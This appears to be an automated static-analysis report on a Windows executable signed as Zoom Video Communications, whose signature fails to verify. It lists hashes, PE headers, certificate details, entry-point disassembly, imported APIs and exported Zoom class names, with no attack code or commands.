              TLSH: 3FB57E607E52CC1DD7667135BC6ABB355A6B2AE07B7C11F3C2CD26A61B646C00F39B02
              File Content Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........E...$...$...$...L...$...L...$...Kx..$...Q...$...Q...$...Q...$...L...$...L...$...L...$...$...%...Q...$...Q...$...Qz..$...$...$.
              Icon Hash: e082c4e4ae8c82e8
              Entrypoint: 0x494ca0
              Entrypoint Section: .text
              Digitally signed: true
              Imagebase: 0x400000
              Subsystem: windows gui
              Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp: 0x669E1AC1 [Mon Jul 22 08:39:29 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major: 6
              OS Version Minor: 0
              File Version Major: 6
              File Version Minor: 0
              Subsystem Version Major: 6
              Subsystem Version Minor: 0
              Import Hash: 0f27251cd0ae6d35bba6ab719b508e1e
              Signature Valid: false
              Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA256 2021 CA1, O="DigiCert, Inc.", C=US
              Signature Validation Error: The digital signature of the object did not verify
              Error Number: -2146869232
              Not Before, Not After
              • 27/06/2024 01:00:00 16/10/2024 00:59:59
              Subject Chain
              • CN="Zoom Video Communications, Inc.", O="Zoom Video Communications, Inc.", L=San Jose, S=California, C=US, SERIALNUMBER=4969967, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
              Version: 3
              Thumbprint MD5: 6FECD6159C33F340CBD846FAE083CAA1
              Thumbprint SHA-1: 326AFFEA74A7E28B42A87C80B8904BD786E1BEF7
              Thumbprint SHA-256: CFBFF4F5B70EC76E43325A587B396AA441FAAB6A91215309C36A4E81DAE11490
              Serial: 039C124448061E99E69CD95D57C807A6
              Instruction
              call 00007F72994B0372h
              jmp 00007F72994AF48Dh
              push ebp
              mov ebp, esp
              push dword ptr [ebp+08h]
              call 00007F72994AF0DEh
              pop ecx
              pop ebp
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              call 00007F72994AF647h
              push 00000000h
              call 00007F72994AF1ABh
              pop ecx
              test al, al
              je 00007F72994AF630h
              push 00494D70h
              call 00007F72994AF329h
              pop ecx
              xor eax, eax
              ret
              push 00000007h
              call 00007F72994B00D0h
              int3
              push esi
              push edi
              push 00000FA0h
              push 005AECA8h
              call dword ptr [004CD30Ch]
              push 004F0860h
              call dword ptr [004CD0ECh]
              mov esi, eax
              test esi, esi
              jne 00007F72994AF633h
              push 004ED208h
              call dword ptr [004CD0ECh]
              mov esi, eax
              test esi, esi
              je 00007F72994AF668h
              push 004D3F34h
              push esi
              call dword ptr [004CD0E8h]
              push 004D3F18h
              push esi
              mov edi, eax
              call dword ptr [004CD0E8h]
              test edi, edi
              je 00007F72994AF634h
              test eax, eax
              je 00007F72994AF630h
              mov dword ptr [005AECC0h], edi
              mov dword ptr [005AECC4h], eax
              pop edi
              pop esi
              ret
              xor eax, eax
              push eax
              push eax
              push 00000001h
              push eax
              call dword ptr [004CD1FCh]
              mov dword ptr [005AECA4h], eax
              test eax, eax
              jne 00007F72994AF609h
              push 00000007h
              call 00007F72994B004Eh
              Name                                  Virtual Address  Virtual Size  Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT          0x110450         0x8c1c0       .rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT          0x19c610         0x118         .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1b1000         0x2ab58       .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_SECURITY        0x23ac00         0x5f48
              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1dc000         0x12206       .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG           0xf32a0          0x70          .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_TLS             0xf3400          0x18          .rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xf3310          0x40          .rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_IAT             0xcd000          0x460         .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
              Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type                              Entropy            Characteristics
              .text     0x1000           0xcb40c       0xcb600   119c6706551fcad3f7f9fc2a5f2d2003  False     0.4501130819760295   data                                   6.583925038489715  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata    0xcd000          0xd0fe8       0xd1000   a7afe32818ced10c5534701d0daa0334  False     0.2295027007326555   data                                   5.854279956818834  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data     0x19e000         0x11f70       0x10800   ba33cd8866252efdfda4432590dfb2a3  False     0.14055101799242425  DOS executable (block device driver)   4.591426088798704  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .PROPSEC  0x1b0000         0xe10         0x1000    620f0b67a91f7f74151bc5be745b7110  False     0.00634765625        data                                   0.0                IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc     0x1b1000         0x2ab58       0x2ac00   b6db9496e25f165677273b209b29582a  False     0.37892909356725146  data                                   5.996038029493702  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc    0x1dc000         0x61e00       0x61e00   59fae4842e955a0fca65dc50f5fac7f5  False     0.8687714519476373   data                                   7.920012596506672  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name           RVA       Size     Type                                                                Language  Country        ZLIB Complexity
              RT_ICON        0x1b15d0  0x528    Device independent bitmap graphic, 16 x 32 x 32, image size 1280    English   United States  0.4401515151515151
              RT_ICON        0x1b1af8  0xb68    Device independent bitmap graphic, 24 x 48 x 32, image size 2880    English   United States  0.29486301369863016
              RT_ICON        0x1b2660  0x1428   Device independent bitmap graphic, 32 x 64 x 32, image size 5120    English   United States  0.23507751937984497
              RT_ICON        0x1b3a88  0x2d28   Device independent bitmap graphic, 48 x 96 x 32, image size 11520   English   United States  0.17439446366782008
              RT_ICON        0x1b67b0  0x5028   Device independent bitmap graphic, 64 x 128 x 32, image size 20480  English   United States  0.12339181286549708
              RT_ICON        0x1bb7d8  0x14028  Device independent bitmap graphic, 128 x 256 x 32, image size 81920 English   United States  0.0954123962908736
              RT_ICON        0x1cf800  0xc16d   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced         English   United States  1.0005250721974273
              RT_GROUP_ICON  0x1db970  0x68     data                                                                English   United States  0.7403846153846154
              RT_VERSION     0x1b1270  0x35c    data                                                                English   United States  0.4313953488372093
              RT_MANIFEST    0x1db9d8  0x17d    XML 1.0 document, ASCII text, with CRLF line terminators            English   United States  0.5931758530183727
              DLL           Import
              KERNEL32.dll  ReadFile, FindFirstFileW, HeapFree, SetLastError, GetFullPathNameW, FindNextFileW, WriteFile, RemoveDirectoryW, SetFilePointer, SetEndOfFile, GetTempPathW, FindClose, CreateFileW, GetFileAttributesW, MultiByteToWideChar, DeleteFileW, HeapAlloc, GetCurrentDirectoryW, SetCurrentDirectoryW, MoveFileExW, GetFileSize, GetProcessHeap, WideCharToMultiByte, SystemTimeToTzSpecificLocalTime, GetTempFileNameW, MoveFileW, FlushFileBuffers, TryEnterCriticalSection, SuspendThread, ResumeThread, SetEvent, ResetEvent, SwitchToThread, GetDynamicTimeZoneInformation, GetTimeZoneInformation, LocalFileTimeToFileTime, OutputDebugStringW, QueryPerformanceFrequency, FileTimeToLocalFileTime, GetProcAddress, GetModuleHandleW, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetModuleHandleA, CancelIo, GetCurrentProcess, CreateNamedPipeW, GetQueuedCompletionStatus, PostQueuedCompletionStatus, CreateIoCompletionPort, ConnectNamedPipe, OutputDebugStringA, CreateProcessW, CreateDirectoryW, TlsSetValue, TlsAlloc, TlsGetValue, TlsFree, GlobalMemoryStatusEx, FreeLibrary, LoadLibraryW, CreateMutexW, ReleaseMutex, OpenProcess, GetTickCount, GetFileTime, VirtualProtect, ReleaseSemaphore, TerminateProcess, WaitForMultipleObjects, FileTimeToSystemTime, Process32NextW, CreateFileA, Process32FirstW, GetWindowsDirectoryW, VerSetConditionMask, CreateSemaphoreW, FlushInstructionCache, VerifyVersionInfoW, CreateDirectoryA, SetDllDirectoryW, VirtualQuery, LoadLibraryExW, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, IsWow64Process, GlobalAlloc, GlobalFree, FindFirstFileExW, LoadLibraryExA, VirtualFree, InterlockedPopEntrySList, GetLocaleInfoW, InitializeCriticalSection, LeaveCriticalSection, EnterCriticalSection, SetConsoleCtrlHandler, ExitProcess, CloseHandle, CreateThread, SystemTimeToFileTime, RtlCaptureStackBackTrace, PulseEvent, TerminateThread, Sleep, CreateEventW, WaitForSingleObject, FormatMessageA, GetCurrentProcessId, DeleteCriticalSection, LocalFree, DecodePointer, RaiseException, GetLastError, CompareStringA, FormatMessageW, GetCurrentThreadId, InitializeCriticalSectionEx, GetModuleFileNameW, VirtualAlloc, GetExitCodeProcess, IsBadReadPtr, K32GetModuleBaseNameW, GetEnvironmentVariableW, MapViewOfFile, CreateFileMappingW, GetSystemInfo, UnmapViewOfFile, OpenThread, HeapDestroy, FindResourceW, LoadResource, FindResourceExW, LockResource, SizeofResource, WriteConsoleW, FreeEnvironmentStringsW, GetConsoleMode, GetConsoleCP, PeekNamedPipe, GetFileType, GetFileInformationByHandle, GetDriveTypeW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, HeapSize, ReadConsoleW, SetStdHandle, HeapReAlloc, SetFilePointerEx, GetFileSizeEx, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, LCMapStringW, GetTimeFormatW, GetDateFormatW, CompareStringW, CreateToolhelp32Snapshot, GetCommandLineW, GetCommandLineA, GetStdHandle, GetStringTypeW, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WaitForSingleObjectEx, EncodePointer, LCMapStringEx, GetCPInfo, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, InitializeSListHead, RtlUnwind, InterlockedPushEntrySList, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, SetEnvironmentVariableW
              USER32.dll    UnregisterClassW, LoadStringA, GetMessageW, SetTimer, TranslateMessage, LoadStringW, DispatchMessageW, PostThreadMessageW, SendMessageTimeoutW, KillTimer, GetUserObjectInformationA, GetProcessWindowStation, GetClassInfoExW, SetWindowLongW, CharUpperW, LoadCursorW, MsgWaitForMultipleObjectsEx, PeekMessageW, IsWindow, RegisterClassExW, CreateWindowExW, IsWindowVisible, DestroyWindow, EnumThreadWindows, CallWindowProcW, DefWindowProcW, GetWindowLongW, MessageBoxW, wsprintfW
              ADVAPI32.dll  RevertToSelf, SetTokenInformation, AllocateAndInitializeSid, CreateWellKnownSid, ImpersonateLoggedOnUser, CreateRestrictedToken, FreeSid, DuplicateTokenEx, OpenProcessToken, ConvertSidToStringSidW, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetTokenInformation, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, RegGetValueW
              SHELL32.dll   SHGetSpecialFolderPathA, SHGetKnownFolderPath, SHGetFolderPathW, SHGetSpecialFolderPathW
              ole32.dll     CoCreateInstance, CoInitializeEx, CoTaskMemFree, CoCreateGuid, StringFromCLSID, CLSIDFromString
              OLEAUT32.dll  VariantChangeType, VariantClear
              SHLWAPI.dll   PathFileExistsW, PathIsRelativeW, PathAppendW
              MAPI32.dll
              PSAPI.DLL     GetModuleFileNameExW, GetModuleInformation, EnumProcessModules
              WINMM.dll     timeGetTime, timeBeginPeriod, timeEndPeriod
              WINTRUST.dll  WTHelperGetProvSignerFromChain, WTHelperProvDataFromStateData, WTHelperGetProvCertFromChain, WinVerifyTrust
              CRYPT32.dll   CertGetNameStringW
              RPCRT4.dll    RpcStringFreeA, UuidToStringA
              Name  Ordinal  Address
              ??0?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2420x42ae60
              ??0?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z2430x42d1c0
              ??0?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2440x42ca50
              ??0?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAE@PBDH00000000@Z2450x429040
              ??0?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2460x42df20
              ??0?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@QAE@PBDH00000000@Z2470x42bf50
              ??0?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2480x4286d0
              ??0?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2490x42c630
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2500x42a820
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@QAE@PBDH00000000@Z2510x42ea20
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@QAE@PBDH00000000@Z2520x42a0e0
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@QAE@PBDH00000000@Z2530x428dd0
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@QAE@PBDH00000000@Z2540x42ce20
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@QAE@PBDH00000000@Z2550x429560
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2560x42f8b0
              ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@QAE@PBDH00000000@Z2570x42f070
              ??0?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@QAE@PBDH00000000@Z2580x42b490
              ??0?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z2590x42ad50
              ??0?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2600x42de10
              ??0?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@QAE@PBDH000000000@Z2610x42c540
              ??0?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2620x42c380
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@QAE@PBDH000000000@Z2630x42e950
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@QAE@PBDH000000000@Z2640x428d00
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2650x429450
              ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2660x42f7a0
              ??0?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z2670x42ac40
              ??0CAtomicInt@Cmm@@QAE@J@Z2680x411460
              ??0CClock@Cmm@@QAE@XZ2690x412020
              ??0CCmmArchiveObjHelper@Cmm@@QAE@PBD@Z2700x4529a0
              ??0CCmmArchiveObjHelper@Cmm@@QAE@PBEI@Z2710x4529c0
              ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ2720x454f50
              ??0CCmmArchivePath@Cmm@@QAE@ABV?$CStringT@_W@1@@Z2730x459bf0
              ??0CCmmArchiveServiceImp@Archive@Cmm@@QAE@XZ2740x455290
              ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ2750x458660
              ??0CCmmArchiveVarivant@Cmm@@QAE@ABV01@@Z2760x4598e0
              ??0CCmmArchiveVarivant@Cmm@@QAE@XZ2770x451ed0
              ??0CCmmPerfTelemetry@@QAE@XZ2780x4651f0
              ??0CCmmPerfTelemetryEventWOStack@@QAE@ABV0@@Z2790x456250
              ??0CCmmPerfTelemetryEventWOStack@@QAE@UPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_J2800x464e80
              ??0CCmmPerfTelemetryEventWStack@@QAE@ABV0@@Z2810x4560a0
              ??0CCmmPerfTelemetryEventWStack@@QAE@UPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_J@2820x464cd0
              ??0CCmmPerfTelemetryLog@@QAE@ABV0@@Z2830x4563b0
              ??0CCmmPerfTelemetryLog@@QAE@ABV?$CStringT@D@Cmm@@0H0@Z2840x4650f0
              ??0CCmmPerfTelemetryStacks@@QAE@ABV0@@Z2850x456300
              ??0CCmmPerfTelemetryStacks@@QAE@ABV?$CStringT@D@Cmm@@0H@Z2860x464fe0
              ??0CCritical@Cmm@@QAE@XZ2870x40c750
              ??0CEvent@Cmm@@QAE@XZ2880x40c220
              ??0CFile@Cmm@@QAE@PAX@Z2890x411460
              ??0CFileName@Cmm@@QAE@$$QAV01@@Z2900x412660
              ??0CFileName@Cmm@@QAE@ABV01@@Z2910x412640
              ??0CFileName@Cmm@@QAE@XZ2920x402340
              ??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z2930x427fd0
              ??0CIPCChannelThread@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@Channel@1@HPAX@Z2940x428040
              ??0CMutex@Cmm@@QAE@XZ2950x4170b0
              ??0CPU@Cmm@@QAE@$$QAV01@@Z2960x44bd40
              ??0CPU@Cmm@@QAE@ABV01@@Z2970x44bcf0
              ??0CPU@Cmm@@QAE@XZ2980x45f270
              ??0CRefThread@Cmm@@QAE@XZ2990x4173b0
              ??0CSBMBMessage_AddClientLog@@QAE@XZ3000x4197e0
              ??0CSBMBMessage_AddToCameraControlGroup@@QAE@XZ3010x427840
              ??0CSBMBMessage_AppSupportNewWhiteBoardSetting@@QAE@XZ3020x427150
              ??0CSBMBMessage_Assisant_Keybase@@QAE@XZ3030x424600
              ??0CSBMBMessage_Assistant_Audio_Configure_Request@@QAE@XZ3040x41c9b0
              ??0CSBMBMessage_Assistant_Audio_Configure_Response@@QAE@XZ3050x41cb90
              ??0CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAE@XZ3060x41fa40
              ??0CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAE@XZ3070x41fb60
              ??0CSBMBMessage_Assistant_Broadcast_Clear_All_Audio_From_Txchannel_Response@@QAE@XZ3080x41fea0
              ??0CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@QAE@XZ3090x41f860
              ??0CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@QAE@XZ3100x41f980
              ??0CSBMBMessage_Assistant_Broadcast_Network_Audio_Stop_Proxy_Response@@QAE@XZ3110x41f9e0
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAE@XZ3120x41fc80
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAE@XZ3130x41fd80
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@QAE@XZ3140x41ff00
              ??0CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAE@XZ3150x41ff60
              ??0CSBMBMessage_Assistant_CEC_LoadResponse@@QAE@XZ3160x41e060
              ??0CSBMBMessage_Assistant_CEC_PowerOnResponse@@QAE@XZ3170x41e120
              ??0CSBMBMessage_Assistant_CEC_StandByResponse@@QAE@XZ3180x41e180
              ??0CSBMBMessage_Assistant_CEC_UnloadResponse@@QAE@XZ3190x41e0c0
              ??0CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@QAE@XZ3200x41e550
              ??0CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@QAE@XZ3210x41e430
              ??0CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@QAE@XZ3220x41e490
              ??0CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAE@XZ3230x41e2a0
              ??0CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@QAE@XZ3240x41e240
              ??0CSBMBMessage_Assistant_ControlSystem_ExecuteSceneRequest@@QAE@XZ3250x41e3d0
              ??0CSBMBMessage_Assistant_ControlSystem_LoadRequest@@QAE@XZ3260x41e1e0
              ??0CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@QAE@XZ3270x41e4f0
              ??0CSBMBMessage_Assistant_DAL_Service_Conf_Render_Change@@QAE@XZ3280x41ef10
              ??0CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@QAE@XZ3290x41e910
              ??0CSBMBMessage_Assistant_DAL_Service_Identify_Device_Request@@QAE@XZ3300x41ed40
              ??0CSBMBMessage_Assistant_DAL_Service_Identify_Device_Response@@QAE@XZ3310x41eda0
              ??0CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAE@XZ3320x41e6d0
              ??0CSBMBMessage_Assistant_DAL_Service_Load_Service_Response@@QAE@XZ3330x41e7f0
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_Added_Notification@@QAE@XZ3340x41f470
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_List_Refresh_Notification@@QAE@XZ3350x41f350
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_Removed_Notification@@QAE@XZ3360x41f4d0
              ??0CSBMBMessage_Assistant_DAL_Service_Network_Device_Update_Notification@@QAE@XZ3370x41f530
              ??0CSBMBMessage_Assistant_DAL_Service_Service_Components_Change_Notification@@QAE@XZ3380x41f590
              ??0CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAE@XZ3390x41f180
              ??0CSBMBMessage_Assistant_DAL_Service_Service_Refresh_Device_List_Request@@QAE@XZ3400x41eeb0
              ??0CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@QAE@XZ3410x41e970
              ??0CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@QAE@XZ3420x41ea90
              ??0CSBMBMessage_Assistant_DAL_Service_Sip_Audio_Render_Change_Notification@@QAE@XZ3430x41f600
              ??0CSBMBMessage_Assistant_DAL_Service_Sip_Render_Change@@QAE@XZ3440x41ef80
              ??0CSBMBMessage_Assistant_DAL_Service_Unload_Service_Request@@QAE@XZ3450x41e850
              ??0CSBMBMessage_Assistant_DAL_Service_Unload_Service_Response@@QAE@XZ3460x41e8b0
              ??0CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Request@@QAE@XZ3470x41eb00
              ??0CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Response@@QAE@XZ3480x41ec20
              ??0CSBMBMessage_Assistant_DAL_Service_Use_Dante_Controller@@QAE@XZ3490x41f080
              ??0CSBMBMessage_Assistant_Exit_Process@@QAE@XZ3500x41c890
              ??0CSBMBMessage_Assistant_LineCallMergedNotification@@QAE@XZ3510x41de90
              ??0CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@QAE@XZ3520x41cec0
              ??0CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@QAE@XZ3530x41dcd0
              ??0CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAE@XZ3540x41cda0
              ??0CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@QAE@XZ3550x41d140
              ??0CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAE@XZ3560x41d250
              ??0CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@QAE@XZ3570x41e000
              ??0CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAE@XZ3580x41d8a0
              ??0CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@QAE@XZ3590x41de30
              ??0CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAE@XZ3600x41db20
              ??0CSBMBMessage_Assistant_SIP_MergeCallResponse@@QAE@XZ3610x41da00
              ??0CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAE@XZ3620x41cfe0
              ??0CSBMBMessage_Assistant_SIP_MessageUploadMemLog@@QAE@XZ3630x41d0e0
              ??0CSBMBMessage_Assistant_SIP_OnCallIncomingNotification@@QAE@XZ3640x41d6c0
              ??0CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAE@XZ3650x41d430
              ??0CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAE@XZ3660x41d4a0
              ??0CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@QAE@XZ3670x41d5c0
              ??0CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAE@XZ3680x41d2c0
              ??0CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@QAE@XZ3690x41cf20
              ??0CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAE@XZ3700x41cbf0
              ??0CSBMBMessage_Assistant_SIP_OnSIPServiceStatusChangedNotification@@QAE@XZ3710x41d720
              ??0CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAE@XZ3720x41dd30
              ??0CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAE@XZ3730x41db90
              ??0CSBMBMessage_Assistant_SIP_SuspendToResume@@QAE@XZ3740x41cd40
              ??0CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAE@XZ3750x41def0
              ??0CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAE@XZ3760x41d780
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Create_Request@@QAE@XZ3770x420300
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Created_Notification@@QAE@XZ3780x420470
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Destroy_Request@@QAE@XZ3790x420410
              ??0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Error_Notification@@QAE@XZ3800x4204d0
              ??0CSBMBMessage_Assistant_SIP_Virtual_Speaker_Create_Request@@QAE@XZ3810x420530
              ??0CSBMBMessage_Assistant_SIP_Virtual_Speaker_Destroy_Request@@QAE@XZ3820x420590
              ??0CSBMBMessage_Assistant_SIP_WMIActive@@QAE@XZ3830x41cf80
